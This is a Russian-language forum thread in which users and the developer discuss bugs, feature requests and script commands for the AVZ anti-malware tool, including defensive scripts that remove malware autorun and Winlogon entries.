Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## rubin

Попробуйте обновиться с другого источника... там их 2

----------


## PavelA

Либо просто скачать только базы с z-oleg.com

----------


## RobinFood

> Имеется система (W2K Pro), в которой точно что-то сидит, потому как при выходе в интернет (dial-up'ном) процесс System открывает кучу соединений.


С большой вероятностью, это соединения от "File and printer sharing". Насколько я помню, они отображаются именно как соединения от процесса System.

----------


## Зайцев Олег

> или может приписывать к папке номер (имя ПК).. а то если обходишь компы с флешкой или с сетевого диска зпускаешь, логи перезаписываются...


Лог можно сохранять из скрипта под любым именем, в скриптовом языке есть команды для получения имени ПК и текущей даты. С карантином сложнее, но тоже решаемо - см. в хелпе, раздел ключи командной строки, там есть ключ для задания полного пути к карантину

----------


## Jef239

> Факт в том что эта программа запускалась при старте Винды. Т.е. это способ автозапуска который АВЗ не контролирует. Т.е. дыра.


Я тебе таких способов сто штук понаделаю. Например воткну батник в автозапуск, а из него - что-то ещё запущу.
Стартовать OLE-сервер может ЛЮБАЯ программа. Так что нужно искать, кто из автозапустившихся программ его стартует.
Единственное - если это OLE-расширение обычного проводника. Не уверен, что EXE, являющиеся OLE-серверами и расширяющие explorer записываются в автозапуск. Уж больно оно экзотично.

----------


## Bratez

http://virusinfo.info/showthread.php?t=17635
В логе HJT видим:


```
O4 - HKCU\..\Run: [amva] C:\WINDOWS\system32\amvo.exe
```

В логах AVZ - ни сном ни духом! Непорядок...

----------


## Зайцев Олег

> http://virusinfo.info/showthread.php?t=17635
> В логе HJT видим:
> 
> 
> ```
> O4 - HKCU\..\Run: [amva] C:\WINDOWS\system32\amvo.exe
> ```
> 
> В логах AVZ - ни сном ни духом! Непорядок...


А файл на диске есть ? Если есть и нулевой длинны, то AVZ его не покажет. И если он его детектит, то тоже не покажет - будет детект в логе, но не в исследовании.

----------


## Bratez

В том-то и дело, что файл есть, AVZ его не детектил, в логе он вообще нигде не отобразился. Я его закарантинил и удалил скриптом.

----------


## Макcим

> А файл на диске есть ? Если есть и нулевой длинны, то AVZ его не покажет.


Это тоже не порядок. Вдруг хорошо маскируется?

----------


## Зайцев Олег

> В том-то и дело, что файл есть, AVZ его не детектил, в логе он вообще нигде не отобразился. Я его закарантинил и удалил скриптом.


Как вариант - юзер сначала запустил AVZ, получил логи, затем он полез проводником за HJ, сработал авторан (он виден в логе AVZ), и установился червяк. Иного объяснения я не вижу, так как amvo.exe всегда хорошо виден в логах

----------


## Макcим

Можно "научить" AVZ не только "видеть" autorun.inf, но и разбирать его, чтобы карантинить запускаемый файл?

----------


## zerocorporated

> Можно "научить" AVZ не только "видеть" autorun.inf, но и разбирать его, чтобы карантинить запускаемый файл?


Лучше наверное не карантинить, а показывать в логе данные по файлу что он запускает, то есть размер и т.д.

----------


## Muffler

Как из скрипта, отправить отчёт AVZ по email, если ISP блокирует 25 порт?

----------


## Muffler

Плюс ооооочень нужны две функции:

 - загрузка файла с интернета.(Типа DownloadFile('URL', 'куда_сохранять');)

 - и запуск приложений из Boot Cleaner( BC_Execute('комадная_строка_с_параметрами');)

PS. Ну и конечно неплохо было бы и UploadFile.

----------


## Kacnep

:001: Здравствуйте. В мастере поиска и устранения проблем. Бывает, что после исправления не отключает загрузку кодеков
Находит, заново эту проблему, в мастере поиска и устранения проблем. (фото прилагаю)




> http://virusinfo.info/showthread.php?t=17635
> В логе HJT видим:
> 
> 
> ```
> O4 - HKCU\..\Run: [amva] C:\WINDOWS\system32\amvo.exe
> ```
> 
> В логах AVZ - ни сном ни духом! Непорядок...


У меня то же такое чудо было. Скриптом удалилось. Был, но AVZ не видел. :Sleeping: ...



> Как вариант - юзер сначала запустил AVZ, получил логи, затем он полез проводником за HJ, сработал авторан (он виден в логе AVZ), и установился червяк. Иного объяснения я не вижу, так как amvo.exe всегда хорошо виден в логах


нет, я заходил из AVZ приложение, как доверенное и запускал HJ.
http://virusinfo.info/showthread.php...highlight=amvo
Жаль что те логи не сохранил.

----------


## anton_dr

Олег, если карантин архивируется вручную, 7zip (4,42 версия) не может распаковать архив.

----------


## Макcим

Эта проблема 7-Zip. Обновись до 4.57

----------


## Зайцев Олег

> Можно "научить" AVZ не только "видеть" autorun.inf, но и разбирать его, чтобы карантинить запускаемый файл?


начиная с 14.02 (т.е. сегодня) в базах изменен анализ autorun.inf - в лог пишется алерт про autorun.inf (и он уходит в карантин), плюс ищутся файлы, которые должны запускаться через autorun.inf - для каждого делается отметка в логе + карантин.

----------


## akok

Уже оценил изменения...очень упрощает анализ

----------


## Bratez

Сегодня встретилось у клиента в реале: пропали все значки в трее. В логе AVZ соответственно об этом сказано. Запускаю Мастер поиска и устранения проблем, проблема находится, нажимаю "исправить", выполняется, перезагружаюсь - значков как не было, так и нет. Запускаю XP Tweaker, и все исправляется двумя тычками мыши. Есть подозрение, что в AVZ Мастер где-то не срабатывает. Олег, проверьте пожалуйста!

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Nick222

Олег, скажите, плз, есть ли в плагине AVZ для The Bat! цифровая подпись, без которой он не сможет работать с Бат 4-х версий:
http://allbat.info/news-273/

----------


## psw

Возникла след. проблема
На системе стоит ссылка на отсутствующий файл в Winlogon Notify

HJT
O20 - Winlogon Notify: reset5 - reset5.dll (file missing)

AVZ
reset5.dll
Активен	Ключ реестра	HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\reset5, DLLName

Я пробую удалить эту ссылку скриптом
begin
 DelWinlogonNotifyByFileName('reset5.dll');
 RebootWindows(true);
end.

но она не удалается, в след. логах то же самое.
Понятно, что можно отключить в HJT, но почему не работает скрипт?
Это моя ошибка или ограничение AVZ?

----------


## Макcим

DelAutorunByFileName тоже не работает, я уже писал об этом. Видимо они связаны.

----------


## rubin

*psw*
Можно и без DelWinlogonNotifyByFileName...


```
begin
RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\reset5');
end.
```

----------


## psw

*rubin*
Так я тоже могу  :Smiley:

----------


## Bratez

Или DelWinlogonNotifyBy*Key*Name();  :Wink:

----------


## Зайцев Олег

> Или DelWinlogonNotifyBy*Key*Name();


Вот именно ...
DelWinlogonNotifyByKeyName - убивает Winlogon вхождение по имени ключа, рекомендуется, когда имя файла точно не известно или пустое. В данном случае именно эту функцию и нужно было применять
DelWinlogonNotifyByFileName - убивает Winlogon вхождение по имени файла, применяется тогда, когда имя файла точно известно.

Логика работы DelWinlogonNotifyByFileName такова:
1. Сканируются все ключи в SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\, для каждого ключа ищется парметр DllName. Если такового нет, то ключ игнорируется
2. Если находится ключ с DllName, то считывается его значение и изучается на предмет того, есть там путь или только голое имя. Если путь есть, то не делаем ничего. Если нет - ищем файл с таким именем в системной папке, если найдем - приделываем к имени путь
3. Сравниваем имя файла, переданное в качестве параметра и имя файла, добытое на шаге 2 без учета регистра. Если найденное на шаге 2 имя файла заканчается на образец, который передан в качестве параметра, то считаем, что мы нашли вхождение WInlogon и оно убивается. Такое сравнение позволяет задавать имя как скажем cscdll.dll, или system32\cscdll.dll, или полный путь\cscdll.dll - сработает в любом варианте.
Естественно, что 
1. Нужно иметь права админа (особенно в Vista)
2. Не должнобыть активного процесса, выполняющего восстановление ключа

----------


## kps

Олег, тогда, я считаю, нужно проверять и писать в протоколе Исследования Системы в таком случае, что reset5.dll не найден на диске, чтобы человек, пишуший скрипт, использовал не DelWinlogonNotifyByFileName, а DelWinlogonNotifyByKeyName для удаления элемента Winlogon.

----------


## Зайцев Олег

> Олег, тогда, я считаю, нужно проверять и писать в протоколе Исследования Системы в таком случае, что reset5.dll не найден на диске, чтобы человек, пишуший скрипт, использовал не DelWinlogonNotifyByFileName, а DelWinlogonNotifyByKeyName для удаления элемента Winlogon.


Для DelWinlogonNotifyByFileName наличие файла на диске не требуется - нужно просто указывать имя файло в точности так, как оно есть (или указывать только имя файла, без пути).

*Добавлено через 6 минут*




> Олег, скажите, плз, есть ли в плагине AVZ для The Bat! цифровая подпись, без которой он не сможет работать с Бат 4-х версий:
> http://allbat.info/news-273/


Цифровой подписи там нет, но с 4.xx он работает и без нее

----------


## kps

> Для DelWinlogonNotifyByFileName наличие файла на диске не требуется - нужно просто указывать имя файло в точности так, как оно есть (или указывать только имя файла, без пути).


Так *psw* в этом посте http://virusinfo.info/showpost.php?p...&postcount=323 же вроде правильно указал имя файла в скрипте, почему у него тогда элемент Winlogon не удалился? Он написал DelWinlogonNotifyByFileName('reset5.dll');

И еще вопрос по поводу скриптов:
Известно, что команда скрипта BC_ImportDeletedList импортирует в настройки BC список удаленных файлов, описанных в командах DeleteFile(которых может быть несколько). Планируется ли расширение этой функции BC_ImportDeletedList для удобства? Т.е. чтобы она импортировала в BC не только список удаленных файлов из команд DeleteFile, но и ещё список удаляемых ключей реестра, BHO, служб и т.д. из следующих команд (или хотя бы из некоторых из них):

DelCLSID
DelBHO
DeleteService
DelWinlogonNotifyByFileName
DelWinlogonNotifyByKeyName
DelAutorunByFileName
RegKeyDel
RegKeyParamDel
DeleteDirectory
DeleteFileMask

Ведь есть же команды для BC:
BC_DeleteReg
BC_DeleteSvcReg
BC_DeleteSvc

К примеру, если импортировать в BC список удаляемых ключей реестра из RegKeyDel, то получится то же самое, что дает и команда BC_DeleteReg и т.д.

----------


## Синауридзе Александр

> Т.е. чтобы она импортировала в BC не только список удаленных файлов из команд DeleteFile, но и ещё список удаляемых ключей реестра, BHO, служб и т.д.


А зачем это делать?



> К примеру, если импортировать в BC список удаляемых ключей реестра из RegKeyDel, то получится то же самое, что дает и команда BC_DeleteReg и т.д.


В чем тут плюс я не уловил. Поясните.

----------


## psw

Интересно, а что означает строка в протоколе про отладчик процесса, впервые появившаяся после сегодяшнего (точнее, уже вчерашнего) обновления AVZ
...
7. Эвристичеcкая проверка системы
Опасно - отладчик процесса "Your Image File Name Here without a path" = "ntsd -d"

----------


## kps

> А зачем это делать?
> 
> В чем тут плюс я не уловил. Поясните.


Для удобства.
Возьмем к примеру такой скрипт 
begin
DeleteFile('C:\trojan.exe');
DeleteService('troj', true);
BC_ImportDeletedList;
ExecuteSysClean;
BC_DeleteSvc('troj');
BC_Activate;
RebootWindows(true);
end.

В нем BC_ImportDeletedList импортирует информацию об удаляемом файле в BC, поэтому не надо дополнительно писать BC_DeleteFile('C:\trojan.exe');
Что касается DeleteService('troj', true);, так вот информацию об удаляемой службе "troj" команда BC_ImportDeletedList в настройки BC не импортирует, поэтому надо дополнительно писать BC_DeleteSvc('troj'), чтобы удалить эту службу на всякий случай еще и через BC. А вот если сделать так, чтобы команда BC_ImportDeletedList добавляла в настройки BC еще и информацию о службе для удаления, то тогда было бы удобнее, я считаю. В этом случае не нужно было бы писать в скрипт команду BC_DeleteSvc('troj').

----------


## drongo

ничего зловредного не видно , зато есть такое : 

Опасно - отладчик процесса "Your Image File Name Here without a path" = "ntsd -d"
Что сиё значит ? 
6 ,9  думаете поможет?

http://virusinfo.info/showthread.php?t=18403

----------


## Зайцев Олег

> ничего зловредного не видно , зато есть такое : 
> 
> Опасно - отладчик процесса "Your Image File Name Here without a path" = "ntsd -d"
> Что сиё значит ? 
> 6 ,9 думаете поможет?
> 
> http://virusinfo.info/showthread.php?t=18403


Это злобный отладчик, который всех поймает и отладит  :Smiley: 
Если серьезно - это следствие "закручивания гаек" в эвристике, это балванка-заглушка, на примере которой MS показывает, как подключать отладчики к процессам. Если запустить скрипт 9, то он его "вылечит", хотя естественно влияния никакого на систему это не окажет.

----------


## kps

> ничего зловредного не видно , зато есть такое : 
> 
> Опасно - отладчик процесса "Your Image File Name Here without a path" = "ntsd -d"
> Что сиё значит ? 
> 6 ,9  думаете поможет?
> 
> http://virusinfo.info/showthread.php?t=18403


Видимо, ошибка в AVZ, см. 
http://virusinfo.info/showthread.php?t=18211

----------


## psw

После обновления AVZ при проверке процессов появляются строки вида
Анализатор - изучается процесс 2840 C:\VS80\Common7\IDE\devenv.exe
[ES]:Возможно Malware, нейрооценка = 5000

Вопрос: а нейрооценка 5000 - это много или мало? Если какие-либо рекомендованные граничные значения такой оценки?

----------


## astra77

Пользуюсь AVZ на своем компе уже более полугода, проблем с обновлением баз и лечением не возникало. сегодня установил AVZ на ноуте система Windows xp, обновил базы, после лечения пропали все сетевые подключения значки на рабочем столе ("телевизоры"), захожу в системную папку "сетевое окружение" жму отбразить сетев. подключения, ничего не отображается папка пустая выходит сообщение - "не удается поместить список сетевых устройств компьютера в папку "сетевые подключения". Проверьте, что служба сетевых подключений включена и выполняется." Что нужно мне сделать? инет после этого тоже не работает.

----------


## Зайцев Олег

> После обновления AVZ при проверке процессов появляются строки вида
> Анализатор - изучается процесс 2840 C:\VS80\Common7\IDE\devenv.exe
> [ES]:Возможно Malware, нейрооценка = 5000
> 
> Вопрос: а нейрооценка 5000 - это много или мало? Если какие-либо рекомендованные граничные значения такой оценки?


Это оценка, выставляемая нейросеткой по разным критериям, выводится редко, чем больше-тем хуже. В данном случае файл не опасен - но что-то там в собранных по нему данных нейросетке не понравилось

*Добавлено через 1 минуту*




> Пользуюсь AVZ на своем компе уже более полугода, проблем с обновлением баз и лечением не возникало. сегодня установил AVZ на ноуте система Windows xp, обновил базы, после лечения пропали все сетевые подключения значки на рабочем столе ("телевизоры"), захожу в системную папку "сетевое окружение" жму отбразить сетев. подключения, ничего не отображается папка пустая выходит сообщение - "не удается поместить список сетевых устройств компьютера в папку "сетевые подключения". Проверьте, что служба сетевых подключений включена и выполняется." Что нужно мне сделать? инет после этого тоже не работает.


Лечение, нейтрализация руткитов и т.п. было включено или нет ? Если лечение отключено, то AVZ вообще никак не вмешивается в работу системы ... если вмешивается, то в логе обезательно об этом пишется

----------


## psw

> Это оценка, выставляемая нейросеткой по разным критериям, выводится редко, чем больше-тем хуже. В данном случае файл не опасен - но что-то там в собранных по нему данных нейросетке не понравилось


У меня за одно сканирование набралось 10 штук (и все с одной и той же нейрооценкой 5000). Все они безопасные (dexplore.exe, AcroRd32.exe  и т.п.) но почему так много сразу и с абсолютно одинаковой оценкой?

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## drongo

Предложение: кнопку в AVZ( хотя бы скриптик )для очистки существующих ключей в MountPoints2 по всему реестру , а также автоматическое блокирование прав всем пользователям включая админа  на новые записи в данном ключе, пока в авз не уберёшь галку  :Wink:

----------


## Зайцев Олег

> У меня за одно сканирование набралось 10 штук (и все с одной и той же нейрооценкой 5000). Все они безопасные (dexplore.exe, AcroRd32.exe и т.п.) но почему так много сразу и с абсолютно одинаковой оценкой?


Они одинаково не опознаны по базе безопасных, им видимо прочие признаки у них схожи ... Странно, что их так много - стоит прислать парочку на анализ, чтобы исключить файловый вирус. В остальном нужно больше смотреть на сообщения анализа с пометкой [ES] для каждого из процессов - это детализация р-тов анализа. Хотя в общем это просто одна из форм эвристики, чтобы привлечь внимание хелперов к неопознанным процессам

*Добавлено через 44 секунды*




> Предложение: кнопку в AVZ( хотя бы скриптик )для очистки существующих ключей в MountPoints2 по всему реестру , а также автоматическое блокирование прав всем пользователям включая админа на новые записи в данном ключе, пока в авз не уберёшь галку


Это можно скриптом восстановления системы сделать ... нужно только название придумать - как это обозвать понятно для пользователя

----------


## astra77

> Лечение, нейтрализация руткитов и т.п. было включено или нет ? Если лечение отключено, то AVZ вообще никак не вмешивается в работу системы ... если вмешивается, то в логе обезательно об этом пишется


Лечение, нейтрализация руткитов было включено, после перезагрузки на компьюторе, всегда все системные настройки восстанавливались, а на ноутбуке такой результат- сетевые подключения пропали, звук и интернет тоже, какой выход скажите пож., переустановка винды ?

----------


## Aleksandra

Редактор скриптов выдает ошибку - "Undeclared identifier: 'DeleteFileMask'", хотя в AVZ скрипт работает. Почему?



```
begin
 DeleteFileMask('C:\WINDOWS\system32\svcd','*.*',true);
 DeleteDirectory('C:\WINDOWS\system32\svcd');
end.
```

----------


## akok

Наверное потому, что этой команды нет в редакторе...

К *Олегу*, будет ли обновляться редактор скриптов AVZ?

----------


## Зайцев Олег

> Лечение, нейтрализация руткитов было включено, после перезагрузки на компьюторе, всегда все системные настройки восстанавливались, а на ноутбуке такой результат- сетевые подключения пропали, звук и интернет тоже, какой выход скажите пож., переустановка винды ?


AVZ такое естественно сделать не может, единственная гипотеза - это то, что на ПК обитал зловред, который патчил системный компоненты. Тогда патченный компонент системы запускает зверя, а зверь - то, что должен был запустить патченный компонент. Это интересная скрытая форма автозапуска, но убиение зловреда приводит к отключению автозапуска. Но без лога сканирования сказать что-то предметно невозможно...

----------


## drongo

astra77, сервис Plug and Play работает ? если нет- включить.

*Добавлено через 17 минут*




> Это можно скриптом восстановления системы сделать ... нужно только название придумать - как это обозвать понятно для пользователя


Назвать просто : 
Oчистить и ограничить права в  ключе MountPoints2 
Clean & restrict rights @ MountPoints2  key.

можно линк на хелп дать, где будет описано подробней.

----------


## astra77

[QUOTE=drongo;192590]astra77, сервис Plug and Play работает ? если нет- включить.

не сочтите за трудность, скажите где сервис Plug and Play проверить включен или нет 

*Панель управления - Администрирование - Службы*

----------


## XP user

> Назвать просто : 
> Oчистить и ограничить права в  ключе MountPoints2 
> Clean & restrict rights @ MountPoints2  key.
> 
> можно линк на хелп дать, где будет описано подробней.


Или так:
'Блокировать обход запрета Autorun'
'Block Autorun Denial Bypass'.

Большинство пользователей скорее всего смутно представляют себe, что такое 'MountPoints2'.  :Smiley: 

Paul

----------


## tol

Сделал настройку Установить драйвер расширенного мониторинга процессов. После этого появилось сообщение - обнаружено новое устройство. Это совпадение или так должно быть?

----------


## drongo

скорее глюк  :Wink:  
если в данном раздела: а логи где ?

----------


## АлександрУ

Обновил базу AVZ, просканировал и получил странное сообщение:

9. Мастер поиска и устранения проблем
 >>  [?1626?]
 >>  [?1627?]
 >>  [?1629?]
Проверка завершена


Это глюк??
Вопрос снят...После перезапуска АВЗ глюк исчез.

----------


## Зайцев Олег

> Обновил базу AVZ, просканировал и получил странное сообщение:
> 
> 9. Мастер поиска и устранения проблем
> >> [?1626?]
> >> [?1627?]
> >> [?1629?]
> Проверка завершена
> 
> 
> ...


Это не глюк, а побочный эффект  :Smiley:  Обновив базы, AVZ не перезагрузил базу локализатора. Такой эффект бывает редко. 
А сообщения - это новая проверка, разрешен ли автозапуск с различных вилов устройст, я только сообщения подрихтую - они не совсем понятны в логе при такой формулировке.

----------


## PavelA

> Сделал настройку Установить драйвер расширенного мониторинга процессов. После этого появилось сообщение - обнаружено новое устройство. Это совпадение или так должно быть?


На одной из тестируемых машинок встречал подобнее. Почему-то винда восприняла драйвер, как новое устройство.

----------


## Bratez

Отключения автозапусков не работают!
Отмечаю, нажимаю Исправить, говорит - успешно. Снова нажимаю Пуск, и их опять находит.

----------


## Зайцев Олег

> Отключения автозапусков не работают!
> Отмечаю, нажимаю Исправить, говорит - успешно. Снова нажимаю Пуск, и их опять находит.


1. Vista без прав запуска в режиме админа
2. Какой-то "анти-что-то там" продукт , который восстанавливает ключи или не дает в них писать

----------


## Bratez

> 1. Vista без прав запуска в режиме админа
> 2. Какой-то "анти-что-то там" продукт , который восстанавливает ключи или не дает в них писать


Ни то ни другое.
XP PreSP3 Jan'08 admin + KIS. Руками все удаляется без вопросов.

----------


## Alex_Goodwin

http://virusinfo.info/showthread.php?t=18533
Вроде бы фолс.

----------


## АлександрУ

На Win2003 и winXPSP2 через мастер проблем пытался отключить автозапуски с устройств и исправить время завершения программ, в итоге ни что не исправилось.
Все делал под админом.

----------


## tol

> На одной из тестируемых машинок встречал подобнее. Почему-то винда восприняла драйвер, как новое устройство.


Павел, с таким сбоем можно бороться или надо удалить драйвер? Если удалить - как?

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Макcим

Выполните стандартный скрипт №6

----------


## Bratez

*Олег*, если не трудно, можно пересобрать дистрибутив на сайте со свежими базами? Задолбали в "Помогите" логи с базами от 12.12.2007  :Wink:

----------


## Макcим

Я уже предлагал перед выполнением скрипта поставить предупреждение если базы старые.

----------


## yog

Скачал новую версию а она на английском.. старие были на рус..
что делать? (windowsXp sp2)

----------


## Kuzz

> Скачал новую версию а она на английском.. старие были на рус..
> что делать? (windowsXp sp2)


Она мультиязычная. А если в командной строке (или ярлыке) задать ключ lang=ru , то и русской станет.
Например: 

```
C:\avz\avz.exe lang=ru
```

----------


## drongo

yog, как вариант: в языковых настройках виндоуса поставить для non-unicode-> русский.

----------


## yog

> Она мультиязычная. А если в командной строке (или ярлыке) задать ключ lang=ru , то и русской станет.
> Например: 
> 
> ```
> C:\avz\avz.exe lang=ru
> ```


а где ета строка?

----------


## Зайцев Олег

> а где ета строка?


Это параметр запуска - его следует задать в командной строке

----------


## XiTri

Или сделать ярлык на прогу и добавить lang=ru в конце поля "объет"
главное кавычки правильно поставить

----------


## akok

В блокнот скопируйте:


```
avz.exe lang=ru
```

И при сохранение документа выберете: *Тип файлов: все файлы.*
Укажите имя файла например ackiyvirus.cmd или yakuhaker.bat

Тут главное чтоб расширение файла было cmd или bat

Положите этот файлик в директорию с AVZ и запускайте вместо avz.exe

----------


## XiTri

Пример:
"K:\Soft\Anti Root Kit\avz4_29.9\avz.exe" lang=en
так я английский посчупал - работает
интересно когда пишеш что-то отличное от ru или en

----------


## yog

> В блокнот скопируйте:
> 
> 
> ```
> avz.exe lang=ru
> ```
> 
> И при сохранение документа выберете: *Тип файлов: все файлы.*
> Укажите имя файла например ackiyvirus.cmd или yakuhaker.bat
> ...


работает !!!!!!  :Roll Eyes (Sarcastic):

----------


## drongo

С ярлыком  самый оптимальный вариант, можно и "горячую клавишу" добавить на вызов программы.
У меня без кавычек работает, просто дописываешь в поле "объект" 
 жать 1 раз пробел, а потом lang=ru или lang=en взависимости от необходимого языка.
jarlyk_avz.JPG

----------


## Rampant

Подскажите что скрывается под цифрами в скобках, и почему так выводится информация.
9. Мастер поиска и устранения проблем
>> Нарушение ассоциации REG файлов
>> [?1626?]
>> [?1627?]
>> [?1629?]

----------


## borka

> Подскажите что скрывается под цифрами в скобках, и почему так выводится информация.
> 9. Мастер поиска и устранения проблем
> >> Нарушение ассоциации REG файлов
> >> [?1626?]
> >> [?1627?]
> >> [?1629?]


http://virusinfo.info/showpost.php?p...&postcount=354

----------


## Rampant

Всё ясно, только не понял, как это устраняется.

----------


## Зайцев Олег

> Всё ясно, только не понял, как это устраняется.


Если еще раз запустить AVZ и повторить скан, то он покажет название проблем. Устранение - через мастер поиск и встренения пробелем, меню "файл"

----------


## AStr

При помещении в карантин в последних строках avz*.ini имеем:

AVZVer=4.29
MainAVBase=30.12.1899

так и надо?

----------


## Зайцев Олег

> При помещении в карантин в последних строках avz*.ini имеем:
> 
> AVZVer=4.29
> MainAVBase=30.12.1899
> 
> так и надо?


Да, это недокументированная фича. Если показывает  30.12.1899, то это означает, что базы не загружены. Возникает, если используется карантин при помощи скрипта (в этом случае AVZ не загружает базу зверей, только вспомогательные базы и базу чистых)

----------


## PavelA

@Олег В связи с тем, что есть вариант создания загрузочной флешки с AVZ нельзя ли предусмотреть возможность сканирования удаленного реестра. В случае нахождения подозрительных файлов поиска их на жестком диске.

Это может пригодиться для варианта, когда система не грузиться с жесткого диска.

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Зайцев Олег

> @Олег В связи с тем, что есть вариант создания загрузочной флешки с AVZ нельзя ли предусмотреть возможность сканирования удаленного реестра. В случае нахождения подозрительных файлов поиска их на жестком диске.
> 
> Это может пригодиться для варианта, когда система не грузиться с жесткого диска.


Я продумываю такой вариант. Удаленный реестр можно в принципе сканировать, но я продумываю вариант AVZ под Linux - в таком варианте бут-образ получается небольшой, но с реестром проблемы ... - в такой ситуации можно только найти файлы реестра и парсить их.

----------


## DemON.!.

Олег здраствуйте у меня AVZ видет процессы без имени
AVZ отмечает их красным и пишет "FU or KernelMode Rootkit"
Helper по этому поводу попросил братиться к вам даю ссылку на топик http://virusinfo.info/showthread.php...d=1#post201293

*Добавлено через 2 минуты*

Процессов более ста

----------


## Зайцев Олег

> Олег здраствуйте у меня AVZ видет процессы без имени
> AVZ отмечает их красным и пишет "FU or KernelMode Rootkit"
> Helper по этому поводу попросил братиться к вам даю ссылку на топик http://virusinfo.info/showthread.php...d=1#post201293
> 
> *Добавлено через 2 минуты*
> 
> Процессов более ста


Да, на Windows 2003 Server такой эффект иногда проявляется. Замечено, что нередко он возникает, если установлено ПО от HP. Видимое проявление - плодятся процессы без имени ... причина в том, что в таблицах хендлов остаются "висячие" дескрипторы, не принадлежащие ни к одному из запущенных процессов, и один из алгоритмов поиск считает, что это может быть хендл реального маскирующегося процесса

----------


## DemON.!.

Большое спасибо за чёткий и грамотный ответ  :Smiley:

----------


## tracert

> @Олег В связи с тем, что есть вариант создания загрузочной флешки с AVZ нельзя ли предусмотреть возможность сканирования удаленного реестра. В случае нахождения подозрительных файлов поиска их на жестком диске.
> 
> Это может пригодиться для варианта, когда система не грузиться с жесткого диска.


Сканирование ресстра присоединенного диска с больной системой ОЧЕНЬ и ОЧЕНЬ нужно!!! Иначе приходиться иногда Regedit'om с LiveCD руками править то, что AVZ делает не напрягаясь.

----------


## Karlson

Подскажите пожалуйста.
в папке Application Data пользователя с правами юзера живет ntos.exe
под пользователем с правами админа выполнил 3-й скрипт - промолчал. это нормально?
 базы от 11.03.
принтскрин прикрепил, логи могу послать, но там о нем ни слова..

----------


## XP user

> Подскажите пожалуйста.
> в папке Application Data пользователя с правами юзера живет ntos.exe
> под пользователем с правами админа выполнил 3-й скрипт - промолчал. это нормально?
>  базы от 11.03.
> принтскрин прикрепил, логи могу послать, но там о нем ни слова..


Там в системе в других местах нет ничего типа catchme.sys или что-нибудь подобнее? 

Paul

----------


## Karlson

> Там в системе в других местах нет ничего типа catchme.sys или что-нибудь подобнее? 
> 
> Paul


не-а..

upd: только что еще раз посмотрел логи - нету вообще ничего, что вызвало бы подозрения...

----------


## Karlson

вот скрины. на первом syscheck из-под юзера, на втором syscure из-под админа. syscure делался перед syscheck-ом.

----------


## Kuzz

Похоже, что из под юзера ntos.exe и winlogon.exe (который в Temp-e) не могут запустить свой драйвер и не могут прописаться в глобальную автозагрузку.
А под админом они не активны, т.к. их никто (и ничто) не запускает.

По видимому, AVZ проверяет только глобальную автозагрузку и автозапуск у текущего пользователя.

----------


## Биомеханик

Можно прокоментировать вот это 




> 2. Проверка памяти
> Количество найденных процессов: 12
> c:\windows\system32\svchost.exe:ext.exe:$DATA >>> Опасно - исполняемый файл в потоке NTFS - возможно, маскировка исполняемого файла 
> Файл успешно помещен в карантин (c:\windows\shell.exe)
> c:\windows\shell.exe >>>>> Trojan.Win32.Qhost.aes успешно удален
> Количество загруженных модулей: 159


1. svchost.exe помощен в карантин?
2. c:\windows\shell.exe и есть svchost.exe? Похоже что нет, тогда см 1.
3. Если c:\windows\shell.exe >>>>> Trojan.Win32.Qhost.aes зачем его в карантин, или см 2?

----------


## pig

1. Нет. Это эвристика самого первого порядка - по именам файлов. Я не видел, чтобы такие объекты карантинились. Хотя надо бы.
2. Нет, речь именно о shell.exe
3. Видимо, заказано карантинить удаляемые.

*Добавлено через 2 минуты*




> По видимому, AVZ проверяет только глобальную автозагрузку и автозапуск у текущего пользователя.


Именно. Для обследования других пользователей надо подгружать их NTUSER.DAT.

----------


## Биомеханик

1. Надобы карантинить.
3. Значит заказано в стандартном скрипте сбора/лечения. Баг?

----------


## Karlson

> Именно. Для обследования других пользователей надо подгружать их NTUSER.DAT.


а можно про вот это поподробнее?
а то все цепляют гадость под юзерами, а лечить приходится под админом..

----------


## zerocorporated

> а можно про вот это поподробнее?
> а то все цепляют гадость под юзерами, а лечить приходится под админом..


Подключать NTUSER.DAT нужно будет если вы лечите из под liveCD, а если из под администратора, то нужно смотреть вручную всех пользователей в HKEY_USERS.

----------


## Зайцев Олег

> Подключать NTUSER.DAT нужно будет если вы лечите из под liveCD, а если из под администратора, то нужно смотреть вручную всех пользователей в HKEY_USERS. Вы можете узнать какому разделу соответствует каждый пользователь посмотрев HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro  l\hivelist - в этом разделе данные по всем подключенным кустам реестра.


Главное - это понять, нужно это делать или нет. Если нужно - я сделаю такую поддержку в менеджере автозапуска AVZ

----------


## XP user

> Главное - это понять, нужно это делать или нет. Если нужно - я сделаю такую поддержку в менеджере автозапуска AVZ


Думаю, что такой функционал не помешал бы (для удобства просто)...

Paul

----------


## pig

> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro  l\hivelist - в этом разделе данные по всем подключенным кустам реестра.


Если пользователь не в системе, его личный куст не загружен.

----------


## Karlson

> Главное - это понять, нужно это делать или нет. Если нужно - я сделаю такую поддержку в менеджере автозапуска AVZ


я думаю будет полезно.

----------


## Синауридзе Александр

> я продумываю вариант AVZ под Linux


И как успехи? Может поделитесь информацией? :Smiley:

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Зайцев Олег

> И как успехи? Может поделитесь информацией?


